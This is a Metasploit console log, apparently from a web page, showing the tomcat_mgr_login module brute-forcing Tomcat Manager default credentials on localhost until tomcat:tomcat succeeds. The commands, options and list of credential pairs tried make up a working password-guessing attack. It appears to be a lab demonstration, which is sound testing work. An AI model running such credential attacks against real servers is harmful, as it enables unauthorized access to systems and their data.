[*] Starting Metasploit Console...
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% %%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% %% %%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% % %%%%%%%% %%%%%%%%%%% http://metasploit.pro %%%%%%%%%%%%%%%%%%%%%%%%%
%% %% %%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% %%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%% %%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%% %% %%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%% %%%%%
%%%% %% %% % %% %% %%%%% % %%%% %% %%%%%% %%
%%%% %% %% % %%% %%%% %%%% %% %%%% %%%% %% %% %% %%% %% %%% %%%%%
%%%% %%%%%% %% %%%%%% %%%% %%% %%%% %% %% %%% %%% %% %% %%%%%
%%%%%%%%%%%% %%%% %%%%% %% %% % %% %%%% %%%% %%% %%% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%% %%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
=[ metasploit v4.11.5-2016010401 ]
+ -- --=[ 1524 exploits - 965 auxiliary - 271 post ]
+ -- --=[ 436 payloads - 37 encoders - 8 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
[-] Warning: This copy of the Metasploit Framework has been corrupted by an installed anti-virus program.
[-] We recommend that you disable your anti-virus or exclude your Metasploit installation path,
[-] then restore the removed files from quarantine or reinstall the framework. For more info:
[-] https://community.rapid7.com/docs/DOC-1273
[-]
[*] Successfully loaded plugin: pro
msf > use auxiliary/scanner/http/tomcat_mgr_login
msf auxiliary(tomcat_mgr_login) > show options
Module options (auxiliary/scanner/http/tomcat_mgr_login):
Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
PASSWORD no A specific password to authenticate with
PASS_FILE D:/metasploit/apps/pro/msf3/data/wordlists/tomcat_mgr_default_pass.txt no File containing passwords, one per line
Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS yes The target address range or CIDR identifier
RPORT 8080 yes The target port
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
TARGETURI /manager/html yes URI for Manager login. Default is /manager/html
THREADS 1 yes The number of concurrent threads
USERNAME no A specific username to authenticate as
USERPASS_FILE D:/metasploit/apps/pro/msf3/data/wordlists/tomcat_mgr_default_userpass.txt no File containing users and passwords separated by space, one
pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE D:/metasploit/apps/pro/msf3/data/wordlists/tomcat_mgr_default_users.txt no File containing users, one per line
VERBOSE true yes Whether to print output for all attempts
VHOST no HTTP server virtual host
msf auxiliary(tomcat_mgr_login) > set rhosts 127.0.0.1
rhosts => 127.0.0.1
msf auxiliary(tomcat_mgr_login) > set stop_on_success true
stop_on_success => true
msf auxiliary(tomcat_mgr_login) > run
[-] 127.0.0.1:8080 TOMCAT_MGR - LOGIN FAILED: admin:admin (Incorrect: )
[-] 127.0.0.1:8080 TOMCAT_MGR - LOGIN FAILED: admin:manager (Incorrect: )
[-] 127.0.0.1:8080 TOMCAT_MGR - LOGIN FAILED: admin:role1 (Incorrect: )
[-] 127.0.0.1:8080 TOMCAT_MGR - LOGIN FAILED: admin:root (Incorrect: )
[-] 127.0.0.1:8080 TOMCAT_MGR - LOGIN FAILED: admin:tomcat (Incorrect: )
[-] 127.0.0.1:8080 TOMCAT_MGR - LOGIN FAILED: admin:s3cret (Incorrect: )
[-] 127.0.0.1:8080 TOMCAT_MGR - LOGIN FAILED: manager:admin (Incorrect: )
[-] 127.0.0.1:8080 TOMCAT_MGR - LOGIN FAILED: manager:manager (Incorrect: )
[-] 127.0.0.1:8080 TOMCAT_MGR - LOGIN FAILED: manager:role1 (Incorrect: )
[-] 127.0.0.1:8080 TOMCAT_MGR - LOGIN FAILED: manager:root (Incorrect: )
[-] 127.0.0.1:8080 TOMCAT_MGR - LOGIN FAILED: manager:tomcat (Incorrect: )
[-] 127.0.0.1:8080 TOMCAT_MGR - LOGIN FAILED: manager:s3cret (Incorrect: )
[-] 127.0.0.1:8080 TOMCAT_MGR - LOGIN FAILED: role1:admin (Incorrect: )
[-] 127.0.0.1:8080 TOMCAT_MGR - LOGIN FAILED: role1:manager (Incorrect: )
[-] 127.0.0.1:8080 TOMCAT_MGR - LOGIN FAILED: role1:role1 (Incorrect: )
[-] 127.0.0.1:8080 TOMCAT_MGR - LOGIN FAILED: role1:root (Incorrect: )
[-] 127.0.0.1:8080 TOMCAT_MGR - LOGIN FAILED: role1:tomcat (Incorrect: )
[-] 127.0.0.1:8080 TOMCAT_MGR - LOGIN FAILED: role1:s3cret (Incorrect: )
[-] 127.0.0.1:8080 TOMCAT_MGR - LOGIN FAILED: root:admin (Incorrect: )
[-] 127.0.0.1:8080 TOMCAT_MGR - LOGIN FAILED: root:manager (Incorrect: )
[-] 127.0.0.1:8080 TOMCAT_MGR - LOGIN FAILED: root:role1 (Incorrect: )
[-] 127.0.0.1:8080 TOMCAT_MGR - LOGIN FAILED: root:root (Incorrect: )
[-] 127.0.0.1:8080 TOMCAT_MGR - LOGIN FAILED: root:tomcat (Incorrect: )
[-] 127.0.0.1:8080 TOMCAT_MGR - LOGIN FAILED: root:s3cret (Incorrect: )
[-] 127.0.0.1:8080 TOMCAT_MGR - LOGIN FAILED: tomcat:admin (Incorrect: )
[-] 127.0.0.1:8080 TOMCAT_MGR - LOGIN FAILED: tomcat:manager (Incorrect: )
[-] 127.0.0.1:8080 TOMCAT_MGR - LOGIN FAILED: tomcat:role1 (Incorrect: )
[-] 127.0.0.1:8080 TOMCAT_MGR - LOGIN FAILED: tomcat:root (Incorrect: )
[+] 127.0.0.1:8080 - LOGIN SUCCESSFUL: tomcat:tomcat
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
网友评论